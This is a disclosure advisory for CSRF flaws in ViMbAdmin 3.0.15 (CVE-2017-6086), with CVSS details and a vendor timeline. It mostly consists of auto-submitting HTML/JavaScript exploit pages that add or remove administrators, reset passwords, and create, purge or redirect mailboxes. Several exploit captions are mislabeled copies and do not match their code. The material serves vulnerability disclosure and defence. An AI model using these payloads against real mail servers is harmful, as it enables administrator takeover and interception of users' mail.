1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 |
# [CVE-2017-6086] Multiple CSRF vulnerabilities in ViMbAdmin version 3.0.15 ## Product Description ViMbAdmin is a web-based interface used to manage a mail server with virtual domains, mailboxes and aliases. It is an open source solution developed by Opensolutions and distributed under the GNU/GPL license version 3. The official web site can be found at http://www.vimbadmin.net and the source code of the application is available on github https://github.com/opensolutions. ## Details **CVE ID**: CVE-2017-6086 **Access Vector**: remote **Security Risk**: high **Vulnerability**: CWE-352 **CVSS Base Score**: 8.8 **CVSS vector**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H ## Proof of concept ### Add administrator user #### Exploit The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged administrator of the targeted ViMbAdmin application. </code><code>html <head> <title>CSRF ViMbAdmin</title> </head> <body> <iframe style="display:none" name="csrf-frame"></iframe> <form id="csrf-form" action="http://<target ip>/admin/add" method="POST" target="csrf-frame" > <input type="text" name="user" value="target@email" > <input type="text" name="password" value="newpassword" > </form> <script>document.getElementById("csrf-form").submit()</script> </body> </code><code> #### Vulnerable code The vulnerable code is located in the <code>addAction()</code> method of the <code><vimbadmin directory>/application/controllers/DomainController.php</code> file. ### Remove administrator user #### Exploit The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged administrator of the targeted ViMbAdmin application. </code><code>html <head> <title>CSRF ViMbAdmin</title> </head> <body> <iframe style="display:none" name="csrf-frame"></iframe> <form id="csrf-form" action="http://<target ip>/admin/purge/aid/<administrator id>" method="GET" target="csrf-frame" > </form> <script>document.getElementById("csrf-form").submit()</script> </body> </code><code> #### Vulnerable code The vulnerable code is located in the <code>purgeAction()</code> method of the <code><vimbadmin directory>/application/controllers/DomainController.php</code> file. ### Change administrator password #### Exploit The following html/javascript code allows to update administrator password. It needs to be visited by a logged administrator of the targeted ViMbAdmin application. </code><code>html <head> <title>CSRF ViMbAdmin</title> </head> <body> <iframe style="display:none" name="csrf-frame"></iframe> <form id="csrf-form" action="http://<target ip>/admin/password/aid/<administrator id>" method="POST" target="csrf-frame" > <input type="text" name="password" value="newpassword" > </form> <script>document.getElementById("csrf-form").submit()</script> </body> </code><code> #### Vulnerable code The vulnerable code is located in the <code>passwordAction()</code> method of the <code><vimbadmin directory>/application/controllers/DomainController.php</code> file. ### Add mailbox address #### Exploit The following html/javascript code allows to update administrator password. It needs to be visited by a logged administrator of the targeted ViMbAdmin application. </code><code>html <head> <title>CSRF ViMbAdmin</title> </head> <body> <iframe style="display:none" name="csrf-frame"></iframe> <form id="csrf-form" action="http://<target ip>/mailbox/add/did/<domain id>" method="POST" target="csrf-frame" > <input type="text" name="local_part" value="<fakeemail>" > <input type="text" name="domain" value="<domain id>" > <input type="text" name="name" value="<fake name>" > <input type="text" name="password" value="<password>" > <input type="text" name="quota" value="0" > <input type="text" name="alt_email" value="" > <input type="text" name="cc_welcome_email" value="" > </form> <script>document.getElementById("csrf-form").submit()</script> </body> </code><code> #### Vulnerable code The vulnerable code is located in the <code>addAction()</code> method of the <code><vimbadmin directory>/application/controllers/MailboxController.php</code> file. ### Purge mailbox #### Exploit The following html/javascript code allows to remove a mailbox address. It needs to be visited by a logged administrator of the targeted ViMbAdmin application. </code><code>html <head> <title>CSRF ViMbAdmin</title> </head> <body> <iframe style="display:none" name="csrf-frame"></iframe> <form id="csrf-form" action="http://<target ip>/mailbox/purge/mid/<mailbox id>" method="POST" target="csrf-frame" > <input type="text" name="data" value="purge" > </form> <script>document.getElementById("csrf-form").submit()</script> </body> </code><code> #### Vulnerable code The vulnerable code is located in the <code>purgeAction()</code> method of the <code><vimbadmin directory>/application/controllers/MailboxController.php</code> file. ### Archive mailbox #### Exploit The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an administrator of the targeted ViMbAdmin application. </code><code>html <head> <title>CSRF ViMbAdmin</title> </head> <body> <iframe style="display:none" name="csrf-frame"></iframe> <form id="csrf-form" action="http://<target ip>/archive/add/mid/<mailbox id>" method="GET" target="csrf-frame" > </form> <script>document.getElementById("csrf-form").submit()</script> </body> </code><code> #### Vulnerable code The vulnerable code is located in the <code>addAction()</code> method of the <code><vimbadmin directory>/application/controllers/ArchiveController.php</code> file. ### Add alias address #### Exploit The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an administrator of the targeted ViMbAdmin application. </code><code>html curl 'http://<ip>/alias/add/did/<domain id>'--data 'local_part=<fake mailbox>&domain=<domain id>&goto%5B%5D=<redirection email address>' <head> <title>CSRF ViMbAdmin</title> </head> <body> <iframe style="display:none" name="csrf-frame"></iframe> <form id="csrf-form" action="http://<target ip>/alias/add/did/<domain id>" method="POST" target="csrf-frame" > <input type="text" name="local_part" value="<fake mailbox>" > <input type="text" name="domain" value="<domain id>" > <input type="text" name="goto[]" value="<redirection email address>" > </form> <script>document.getElementById("csrf-form").submit()</script> </body> </code><code> #### Vulnerable code The vulnerable code is located in the <code>addAction()</code> method of the <code><vimbadmin directory>/application/controllers/AliasController.php</code> file. ### Remove alias address #### Exploit The following html/javascript code allows the removal of a alias address. It needs to be visited by a logged administrator of the targeted ViMbAdmin application. </code><code>html <head> <title>CSRF ViMbAdmin</title> </head> <body> <iframe style="display:none" name="csrf-frame"></iframe> <form id="csrf-form" action="http://<target ip>/alias/delete/alid/<alias id>" method="GET" target="csrf-frame" > </form> <script>document.getElementById("csrf-form").submit()</script> </body> </code><code> #### Vulnerable Code The vulnerable code is located in the <code>addAction()</code> method of the <code><vimbadmin directory>/application/controllers/AliasController.php</code> file. ## Affected version * tested on version 3.0.15 ## Timeline (dd/mm/yyyy) * 22/01/2017 : Initial discovery. * 16/02/2017 : First contact with opensolutions.io * 16/02/2017 : Advisory sent. * 24/02/2017 : Reply from the owner, acknowledging the report and planning to fix the vulnerabilities. * 13/03/2017 : Sysdream Labs request for an update. * 29/03/2017 : Second request for an update. * 29/03/2017 : Reply from the owner stating that he has no time to fix the issues. * 03/05/2017 : Full disclosure. ## Credits * Florian NIVETTE, Sysdream (f.nivette -at- sysdream -dot- com) |